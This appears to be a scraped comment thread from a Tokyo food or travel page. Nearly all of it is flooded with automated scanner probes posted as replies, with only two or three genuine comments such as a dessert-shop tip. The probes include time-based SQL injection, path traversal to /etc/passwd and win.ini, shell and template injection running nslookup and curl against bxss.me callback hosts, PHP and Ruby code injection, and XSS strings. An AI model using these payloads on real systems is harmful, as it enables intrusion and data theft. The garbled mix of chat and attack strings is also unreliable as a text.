'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
'"
re: thetokyogourmet
@@Ywmze
re: thetokyogourmet
(select 198766*667891)
re: thetokyogourmet
(select 198766*667891 from DUAL)
@thetokyogourmet thanks! Will try it out.
re: Yee How
Npn5iNOK
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+957-957-1=0+0+0+1
re: Yee How
-1 OR 3+957-957-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
kDR3Fgj1'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 754=(SELECT 754 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 833=(SELECT 833 FROM PG_SLEEP(15))--
re: Yee How
fArTLp88' OR 361=(SELECT 361 FROM PG_SLEEP(15))--
re: Yee How
ghoVbpVc') OR 810=(SELECT 810 FROM PG_SLEEP(15))--
re: Yee How
H3vtdYNG')) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@fRqTL
re: Yee How
1DD35dkspYO
re: Yee How
response.write(9928279*9114299)
re: Yee How
'+response.write(9928279*9114299)+'
re: Yee How
%0abcc:074625.67-19840.67.ab8d3.19990.2@bxss.me
re: Yee How
"+response.write(9928279*9114299)+"
re: Yee How
to@example.com>%0d%0abcc:074625.67-19841.67.ab8d3.19990.2@bxss.me
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
${9999145+9999543}
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
echo yzfzgw$()\ ghmfuq\nz^xyu||a #' &echo yzfzgw$()\ ghmfuq\nz^xyu||a #|" &echo yzfzgw$()\ ghmfuq\nz^xyu||a #
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
&echo jkytyu$()\ ihfxej\nz^xyu||a #' &echo jkytyu$()\ ihfxej\nz^xyu||a #|" &echo jkytyu$()\ ihfxej\nz^xyu||a #
re: Yee How
)
re: Yee How
/etc/passwd
re: Yee How
|echo vfayjp$()\ htskyo\nz^xyu||a #' |echo vfayjp$()\ htskyo\nz^xyu||a #|" |echo vfayjp$()\ htskyo\nz^xyu||a #
re: Yee How
!(()&&!|*|*|
re: Yee How
%2fetc%2fpasswd
re: Yee How
(nslookup hitskapklhyrre57e7.bxss.me||perl -e "gethostbyname('hitskapklhyrre57e7.bxss.me')")
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
^(#$!@#$)(()))******
re: Yee How
$(nslookup hitzykhxxiynq734fe.bxss.me||perl -e "gethostbyname('hitzykhxxiynq734fe.bxss.me')")
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
&nslookup hithofeptccet694e7.bxss.me&'\"`0&nslookup hithofeptccet694e7.bxss.me&`'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
&(nslookup hitlztqelahsua9235.bxss.me||perl -e "gethostbyname('hitlztqelahsua9235.bxss.me')")&'\"`0&(nslookup hitlztqelahsua9235.bxss.me||perl -e "gethostbyname('hitlztqelahsua9235.bxss.me')")&`'
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
|(nslookup hitcuxyorexyqd823c.bxss.me||perl -e "gethostbyname('hitcuxyorexyqd823c.bxss.me')")
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
`(nslookup hitxdwebyjrdq73be6.bxss.me||perl -e "gethostbyname('hitxdwebyjrdq73be6.bxss.me')")`
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
'.gethostbyname(lc('hitqx'.'eqknnyvz2afc0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(66).chr(99).chr(69).'
re: Yee How
;(nslookup hitemntsvgtsj7d393.bxss.me||perl -e "gethostbyname('hitemntsvgtsj7d393.bxss.me')")|(nslookup hitemntsvgtsj7d393.bxss.me||perl -e "gethostbyname('hitemntsvgtsj7d393.bxss.me')")&(nslookup hitemntsvgtsj7d393.bxss.me||perl -e "gethostbyname('hitemntsvgtsj7d393.bxss.me')")
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
file:///etc/passwd
re: Yee How
".gethostbyname(lc("hitje"."vuxrtyti0efaf.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(82).chr(104).chr(89)."
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
/WEB-INF/web.xml
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
/etc/shells
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
c:/windows/win.ini
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
bxss.me
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(117).concat(65).concat(119).concat(65)+(require"socket"
Socket.gethostbyname("hitxw"+"ljxqfxzj3e98f.bxss.me.")[3].to_s)+"
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(110).concat(72).concat(103).concat(82)+(require'socket'
Socket.gethostbyname('hitzy'+'lkbkvfuc749b5.bxss.me.')[3].to_s)+'
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
';print(md5(31337));$a='
re: Yee How
";print(md5(31337));$a="
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
'"
re: Yee How
${@print(md5(31337))}
re: Yee How
WEB-INF/web.xml
re: Yee How
<!--
re: Yee How
${@print(md5(31337))}\
re: Yee How
WEB-INF\web.xml
re: Yee How
'.print(md5(31337)).'
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+920-920-1=0+0+0+1 --
re: Yee How
-1 OR 3+920-920-1=0+0+0+1 --
re: Yee How
-1 OR 2+120-120-1=0+0+0+1
re: Yee How
-1 OR 3+120-120-1=0+0+0+1
re: Yee How
-1' OR 2+165-165-1=0+0+0+1 --
re: Yee How
-1' OR 3+165-165-1=0+0+0+1 --
re: Yee How
-1' OR 2+496-496-1=0+0+0+1 or 'D2tfGEZt'='
re: Yee How
-1' OR 3+496-496-1=0+0+0+1 or 'D2tfGEZt'='
re: Yee How
-1" OR 2+650-650-1=0+0+0+1 --
re: Yee How
-1" OR 3+650-650-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
1kGSqSpo'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 811=(SELECT 811 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 883=(SELECT 883 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 656=(SELECT 656 FROM PG_SLEEP(15))--
re: Yee How
qF7C4Bkf' OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: Yee How
hHHJ2aLr') OR 492=(SELECT 492 FROM PG_SLEEP(15))--
re: Yee How
yyWXrYX0')) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@a0z3y
re: Yee How
1FKTADSTT0
re: Yee How
response.write(9662853*9587776)
re: Yee How
'+response.write(9662853*9587776)+'
re: Yee How
"+response.write(9662853*9587776)+"
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
${9999393+9999650}
re: Yee How
file:///etc/passwd
re: Yee How
../
re: Yee How
)
re: Yee How
!(()&&!|*|*|
re: Yee How
redirtest.acx
re: Yee How
^(#$!@#$)(()))******
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Yee How
echo qdydcg$()\ prllhm\nz^xyu||a #' &echo qdydcg$()\ prllhm\nz^xyu||a #|" &echo qdydcg$()\ prllhm\nz^xyu||a #
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Yee How
'.gethostbyname(lc('hitnt'.'uqtbbpwr70e94.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(87).chr(103).chr(71).'
re: Yee How
&echo yqtyir$()\ wrmvlp\nz^xyu||a #' &echo yqtyir$()\ wrmvlp\nz^xyu||a #|" &echo yqtyir$()\ wrmvlp\nz^xyu||a #
re: Yee How
/etc/shells
re: Yee How
".gethostbyname(lc("hitrz"."ubawbmpl7c09c.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(84).chr(119).chr(65)."
re: Yee How
|echo sfuirg$()\ eroufy\nz^xyu||a #' |echo sfuirg$()\ eroufy\nz^xyu||a #|" |echo sfuirg$()\ eroufy\nz^xyu||a #
re: Yee How
../../../../../../../../../../../../../../etc/shells
re: Yee How
gethostbyname(lc('hitwq'.'yflgcmeud3b86.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(70).chr(101).chr(78)
re: Yee How
expr 9000309502 - 982192
re: Yee How
c:/windows/win.ini
re: Yee How
(nslookup -q=cname hittkhzevagtk9481a.bxss.me||curl hittkhzevagtk9481a.bxss.me))
re: Yee How
bxss.me
re: Yee How
$(nslookup -q=cname hitzqdawqeqhhe78c6.bxss.me||curl hitzqdawqeqhhe78c6.bxss.me)
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
&nslookup -q=cname hitxcowzxarnce2260.bxss.me&'\"`0&nslookup -q=cname hitxcowzxarnce2260.bxss.me&`'
re: Yee How
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Yee How
http://bxss.me/t/fit.txt?.jpg
re: Yee How
&(nslookup -q=cname hitxbtrrmqomu01d0a.bxss.me||curl hitxbtrrmqomu01d0a.bxss.me)&'\"`0&(nslookup -q=cname hitxbtrrmqomu01d0a.bxss.me||curl hitxbtrrmqomu01d0a.bxss.me)&`'
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
|(nslookup -q=cname hitudjiujnrrvdd32e.bxss.me||curl hitudjiujnrrvdd32e.bxss.me)
re: Yee How
'"()
re: Yee How
';print(md5(31337));$a='
re: Yee How
`(nslookup -q=cname hitmzelqldcyqf8968.bxss.me||curl hitmzelqldcyqf8968.bxss.me)`
re: Yee How
'&&sleep(27*1000)*gapmmz&&'
re: Yee How
";print(md5(31337));$a="
re: Yee How
;(nslookup -q=cname hitwjrzudhtyqe14c1.bxss.me||curl hitwjrzudhtyqe14c1.bxss.me)|(nslookup -q=cname hitwjrzudhtyqe14c1.bxss.me||curl hitwjrzudhtyqe14c1.bxss.me)&(nslookup -q=cname hitwjrzudhtyqe14c1.bxss.me||curl hitwjrzudhtyqe14c1.bxss.me)
re: Yee How
"&&sleep(27*1000)*dadiml&&"
re: Yee How
${@print(md5(31337))}
re: Yee How
|(nslookup${IFS}-q${IFS}cname${IFS}hitltdhgdutzsddf9c.bxss.me||curl${IFS}hitltdhgdutzsddf9c.bxss.me)
re: Yee How
'||sleep(27*1000)*xzmujr||'
re: Yee How
${@print(md5(31337))}\
re: Yee How
&(nslookup${IFS}-q${IFS}cname${IFS}hitfbxdlgkggi3aa68.bxss.me||curl${IFS}hitfbxdlgkggi3aa68.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfbxdlgkggi3aa68.bxss.me||curl${IFS}hitfbxdlgkggi3aa68.bxss.me)&`'
re: Yee How
"||sleep(27*1000)*toyiqg||"
re: Yee How
'.print(md5(31337)).'
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(100).concat(82).concat(117).concat(88)+(require"socket"
Socket.gethostbyname("hitcr"+"euhfduwr370d9.bxss.me.")[3].to_s)+"
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(111).concat(77).concat(107).concat(71)+(require'socket'
Socket.gethostbyname('hitee'+'vnjmdpbe66bc0.bxss.me.')[3].to_s)+'
re: Yee How
'A'.concat(70-3).concat(22*4).concat(118).concat(70).concat(107).concat(82)+(require'socket'
Socket.gethostbyname('hitwp'+'siauyyou313a2.bxss.me.')[3].to_s)
re: Yee How
replies
re: Yee How
'"
re: Yee How
replies�
re: Yee How
<!--
re: Yee How
replies/.
re: Yee How
'"()&%<zzz><ScRiPt >lB0f(9767)</ScRiPt>
re: Yee How
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitkqalkmjgtq43f64.bxss.me")}}
re: Yee How
'"()&%<zzz><ScRiPt >lB0f(9935)</ScRiPt>
re: Yee How
9518101
re: Yee How
RpKRP6Ae
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
-1 OR 5*5=25 --
re: Yee How
-1 OR 5*5=26 --
re: Yee How
-1 OR 5*5=25
re: Yee How
-1 OR 5*5=26
re: Yee How
*if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
-1 waitfor delay '0:0:15' --
re: Yee How
WTQevQQq'; waitfor delay '0:0:15' --
re: Yee How
-1 OR 16=(SELECT 16 FROM PG_SLEEP(15))--
re: Yee How
-1) OR 194=(SELECT 194 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 134=(SELECT 134 FROM PG_SLEEP(15))--
re: Yee How
kQdAyPEG' OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: Yee How
Stjb8Ppw') OR 959=(SELECT 959 FROM PG_SLEEP(15))--
re: Yee How
WEFYIKzS')) OR 630=(SELECT 630 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
'"
re: Yee How
@@ErkbZ
re: Yee How
(select 198766*667891)
re: Yee How
(select 198766*667891 from DUAL)
I'm not really a dessert person so take my recommendation with a grain of salt. Ungrain in Minamiaoyama, I went once and its a nice little shop, need to book a session before you visit. Think they have different offerings with seasonal ingredients.
re: Wanderlusting
8umTU96i
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 2+428-428-1=0+0+0+1
re: Wanderlusting
-1 OR 3+428-428-1=0+0+0+1
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
nm82qRvg'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: Wanderlusting
OLZjhiVE' OR 747=(SELECT 747 FROM PG_SLEEP(15))--
re: Wanderlusting
rSeD4opN') OR 696=(SELECT 696 FROM PG_SLEEP(15))--
re: Wanderlusting
U8DXSnn2')) OR 172=(SELECT 172 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
